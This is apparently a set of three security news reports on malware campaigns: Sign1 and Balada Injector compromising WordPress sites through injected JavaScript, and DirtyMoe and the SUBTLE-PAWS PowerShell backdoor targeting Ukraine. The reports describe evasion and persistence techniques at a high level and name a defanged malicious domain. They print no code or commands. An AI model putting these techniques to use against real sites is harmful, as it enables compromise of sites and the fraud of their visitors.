Mar 22, 2024NewsroomWeb Security / Vulnerability

A massive malware campaign dubbed Sign1 has compromised over 39,000 WordPress sites in the last six months, using malicious JavaScript injections to redirect users to scam sites.

The most recent variant of the malware is estimated to have infected no less than 2,500 sites over the past two months alone, Sucuri said in a report published this week.

The attacks entail injecting rogue JavaScript into legitimate HTML widgets and plugins that allow for arbitrary JavaScript and other code to be inserted, providing attackers with an opportunity to add their malicious code.

The XOR-encoded JavaScript code is subsequently decoded and used to execute a JavaScript file hosted on a remote server, which ultimately facilitates redirects to a VexTrio-operated traffic distribution system (TDS) but only if certain criteria are met.

What’s more, the malware uses time-based randomization to fetch dynamic URLs that change every 10 minutes to get around blocklists. These domains are registered a few days prior to their use in attacks.

“One of the most noteworthy things about this code is that it is specifically looking to see if the visitor has come from any major websites such as Google, Facebook, Yahoo, Instagram etc.,” security researcher Ben Martin said. “If the referrer does not match to these major sites, then the malware will not execute.”

Site visitors are then taken to other scam sites by executing another JavaScript from the same server.

The Sign1 campaign, first detected in the second half of 2023, has witnessed several iterations, with the attackers leveraging as many as 15 different domains since July 31, 2023.

It’s suspected that WordPress sites have been taken over by means of a brute-force attack, although adversaries could also leverage security flaws in plugins and themes to obtain access.

“Many of the injections are found inside WordPress custom HTML widgets that the attackers add to compromised websites,” Martin said. “Quite often, the attackers install a legitimate Simple Custom CSS and JS plugin and inject the malicious code using this plugin.”

This approach of not placing any malicious code into server files allows the malware to stay undetected for extended periods of time, Sucuri said.

Feb 02, 2024NewsroomCryptojacking / Malware

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned that more than 2,000 computers in the country have been infected by a strain of malware called DirtyMoe.

The agency attributed the campaign to a threat actor it calls UAC-0027.

DirtyMoe, active since at least 2016, is capable of carrying out cryptojacking and distributed denial-of-service (DDoS) attacks. In March 2022, cybersecurity firm Avast revealed the malware’s ability to propagate in a worm-like fashion by taking advantage of known security flaws.

The DDoS botnet is known to be delivered by means of another malware referred to as Purple Fox or via bogus MSI installer packages for popular software such as Telegram. Purple Fox is also equipped with a rootkit that allows the threat actors to hide the malware on the machine and make it difficult to detect and remove.

The exact initial access vector used in the campaign targeting Ukraine is currently unknown. CERT-UA is recommending that organizations keep their systems up-to-date, enforce network segmentation, and monitor network traffic for any anomalous activity.

The disclosure comes as Securonix detailed an ongoing phishing campaign known as STEADY#URSA targeting Ukrainian military personnel with the goal of delivering a bespoke PowerShell backdoor dubbed SUBTLE-PAWS.

“The exploitation chain is relatively simple: it involves the target executing a malicious shortcut (.lnk) file which loads and executes a new PowerShell backdoor payload code (found inside another file contained within the same archive),” security researchers Den Iuzvyk, Tim Peck, and Oleg Kolesnikov said.

The attack is said to be related to a threat actor known as Shuckworm, which is also known as Aqua Blizzard (formerly Actinium), Armageddon, Gamaredon, Iron Tilden, Primitive Bear, Trident Ursa, UNC530, and Winterflounder. Active since at least 2013, it’s assessed to be part of Russia’s Federal Security Service (FSB).

SUBTLE-PAWS, in addition to setting up persistence on the host, uses Telegram’s blogging platform called Telegraph to retrieve the command-and-control (C2) information, a technique previously identified as associated with the adversary since early 2023, and can propagate through removable attached drives.

Gamaredon’s ability to spread via USB drives was also documented by Check Point in November 2023, which named the PowerShell-based USB worm LitterDrifter.

“The SUBTLE-PAWS backdoor uses advanced techniques to execute malicious payloads dynamically,” the researchers said.

“They store and retrieve executable PowerShell code from the Windows Registry which can assist in evading traditional file-based detection methods. This approach also aids in maintaining persistence on the infected system, as the malware can initiate itself again after reboots or other interruptions.”

Jan 15, 2024NewsroomWebsite Security / Vulnerability

Thousands of WordPress sites using a vulnerable version of the Popup Builder plugin have been compromised with a malware called Balada Injector.

First documented by Doctor Web in January 2023, the campaign takes place in a series of periodic attack waves, weaponizing security flaws WordPress plugins to inject backdoor designed to redirect visitors of infected sites to bogus tech support pages, fraudulent lottery wins, and push notification scams.

Subsequent findings unearthed by Sucuri have revealed the massive scale of the operation, which is said to have been active since 2017 and infiltrated no less than 1 million sites since then.

The GoDaddy-owned website security company, which detected the latest Balada Injector activity on December 13, 2023, said it identified the injections on over 7,100 sites.

These attacks take advantage of a high-severity flaw in Popup Builder (CVE-2023-6000, CVSS score: 8.8) – a plugin with more than 200,000 active installs – that was publicly disclosed by WPScan a day before. The issue was addressed in version 4.2.3.

“When successfully exploited, this vulnerability may let attackers perform any action the logged‑in administrator they targeted is allowed to do on the targeted site, including installing arbitrary plugins, and creating new rogue Administrator users,” WPScan researcher Marc Montpas said.

The ultimate goal of the campaign is to insert a malicious JavaScript file hosted on specialcraftbox[.]com and use it to take control of the website and load additional JavaScript in order to facilitate malicious redirects.

Furthermore, the threat actors behind Balada Injector are known to establish persistent control over compromised sites by uploading backdoors, adding malicious plugins, and creating rogue blog administrators.

This is often accomplished by using the JavaScript injections to specifically target logged-in site administrators.

“The idea is when a blog administrator logs into a website, their browser contains cookies that allow them to do all their administrative tasks without having to authenticate themselves on every new page,” Sucuri researcher Denis Sinegubko noted last year.

“So, if their browser loads a script that tries to emulate administrator activity, it will be able to do almost anything that can be done via the WordPress admin interface.”

The new wave is no exception in that if logged-in admin cookies are detected, it weaponizes the elevated privileges to install and activate a rogue backdoor plugin (“wp-felody.php” or “Wp Felody”) so as to fetch a second-stage payload from the aforementioned domain.

The payload, another backdoor, is saved under the name “sasas” to the directory where temporary files are stored, and is then executed and deleted from disk.

“It checks up to three levels above the current directory, looking for the root directory of the current site and any other sites that may share the same server account,” Sinegubko said.

“Then, in the detected site root directories, it modifies the wp-blog-header.php file to inject the same Balada JavaScript malware as was originally injected via the Popup Builder vulnerability.”